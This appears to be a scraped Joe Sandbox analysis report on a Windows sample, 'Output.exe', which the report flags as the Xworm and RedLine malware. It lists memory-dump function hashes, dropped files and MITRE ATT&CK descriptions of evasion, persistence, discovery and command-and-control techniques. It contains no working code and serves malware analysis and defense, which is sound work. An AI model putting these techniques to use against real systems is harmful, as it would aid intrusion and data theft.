Download Yara Rule

Strings

<N_^, xrefs: 00007FF886E30801

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID: <N_^
API String ID: 0-1347224999
Opcode ID: 42f9d02250857ddd1eceda9e246f9528bcc2d7c180e193e8a6f118900cf879f0
Instruction ID: ea50f1fb2fd33485691b2d6315fb1954d9512bcd3ed315e5c0168e88aef07020
Opcode Fuzzy Hash: 42f9d02250857ddd1eceda9e246f9528bcc2d7c180e193e8a6f118900cf879f0
Instruction Fuzzy Hash: FD51F835A2911A8FE344FB9CD0A53E9B7A2FF96254F904479E459C3387CD2C6805C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E313F3 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15132191f3f991595a51c4e24fa098280c9538cf293f3bfa0d7b86ba73195135
Instruction ID: 17ac7fb6b04499b4123718ab32187cd7d82ae0968b4b46ea5ab0a05f49a38837
Opcode Fuzzy Hash: 15132191f3f991595a51c4e24fa098280c9538cf293f3bfa0d7b86ba73195135
Instruction Fuzzy Hash: CC31C422E18A8F4FE740E7A8C8651FDBBB2FF95290F54017AD01AD72D7CD242C058380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E313F0 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e3af42fe626c161e86ee9127a1b5135037a4a2e25558fc953b6831660365c6
Instruction ID: c33d1b0fa824c1e1735ebb6e360092c5206f0f224860e73b0ec28d9e26fd2f3c
Opcode Fuzzy Hash: d3e3af42fe626c161e86ee9127a1b5135037a4a2e25558fc953b6831660365c6
Instruction Fuzzy Hash: E531B122D18A8F4FE740E7A8C8652FDBBB2FF55290F5401BAD01AD72D7CE282C058380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30EEE Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f12ce19762653820c4a37290b8ce619e58eb1cb5e72256bdf79841d9cadb05fd
Instruction ID: 27da631be2c3f2ebde6624b5a639131fd4cf131a9bfa6429dafb5c7e19226e75
Opcode Fuzzy Hash: f12ce19762653820c4a37290b8ce619e58eb1cb5e72256bdf79841d9cadb05fd
Instruction Fuzzy Hash: 0B510721A1D6860FE356A7BC98652B57BE1EF87264B1940FBD08DCB193DD0C5C47C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30668 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7345806e07ce6379bb19557301c4960c0c05e6e5a38f2e4b859842f9de5734f4
Instruction ID: dea890aa6b8d3a35c6cb37b1d42c0a827010419750e07fe5b9e8e1db1b971e00
Opcode Fuzzy Hash: 7345806e07ce6379bb19557301c4960c0c05e6e5a38f2e4b859842f9de5734f4
Instruction Fuzzy Hash: 1B31E421F189494FE6D8EB6C546A379B7C2EF99755F0401BEE04EC7393DE68AC428341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E322FC Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f6ac79a19a141d174854ca548d4f7008c3c4776764623d2ec3994c55c2ff93
Instruction ID: 12b77e762da4d95ef98d8bade310eaa3402989e938272641531a192fa8201459
Opcode Fuzzy Hash: 85f6ac79a19a141d174854ca548d4f7008c3c4776764623d2ec3994c55c2ff93
Instruction Fuzzy Hash: 3731B121F189494FE7D8EB6C546A378B7C2EF99655F0405BEE04EC7393DE68AC428341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30C4C Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5fd18504485905be693ab09e6f5290ccce86b3494285c30bc98d5b1ec0e1803
Instruction ID: 694fad84e3953b8f8cc446c3d37c7142bf8126ef797e03734682d519110cca51
Opcode Fuzzy Hash: d5fd18504485905be693ab09e6f5290ccce86b3494285c30bc98d5b1ec0e1803
Instruction Fuzzy Hash: C4314130E2890E8FEB88EBA8C4557EDB7E2FFA9344F904575D009D7286CD386845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30D81 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9047e8c2f2675b8034b331c45b28e8a875cd5257cd8f53eb47a23da0537919f3
Instruction ID: e4217b26bf75aab727c0dec630d5e2c0c4736f6742d77debebaddffe271361ea
Opcode Fuzzy Hash: 9047e8c2f2675b8034b331c45b28e8a875cd5257cd8f53eb47a23da0537919f3
Instruction Fuzzy Hash: D4216261F18A464FE784A6E8985A3B967D2FFA5B90F5442B6E00DC3283DD18AC418742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E32431 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8973f8dd34cf7bd8bf14726f894bf2c3b73f40089158fc650740b16babe4a9
Instruction ID: 6b13c6fcf5e5b49bdd8496cd65c65d7b9cbf243eca161840bfee9d10d275a3b8
Opcode Fuzzy Hash: ea8973f8dd34cf7bd8bf14726f894bf2c3b73f40089158fc650740b16babe4a9
Instruction Fuzzy Hash: 0C012120D0D7D78FE782A7384856475BFF1AFA6384F1804AAE4C9C70ABE9089D46C343

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF886E30E67 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2353440272.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff886e30000_mstc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75de05dcf287aa7c948d711bd76ada2fa5979c13c26cbb59952a87f3421e8ceb
Instruction ID: 8b8b93b543f3586ded9d0acf2a518b94bb7fc698a6c10d2e495274d8bc058b9e
Opcode Fuzzy Hash: 75de05dcf287aa7c948d711bd76ada2fa5979c13c26cbb59952a87f3421e8ceb
Instruction Fuzzy Hash: E4E0ED21B149194FEF40EBECA8553FCB3D2EB9C692F104177D50DD3296DE2898418792

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Output.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\XClient.exe

C:\ProgramData\build.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mstc.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0drb40ud.k5o.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gn3glvf.qj1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mljleyk.xan.ps1

Windows Analysis Report
Output.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre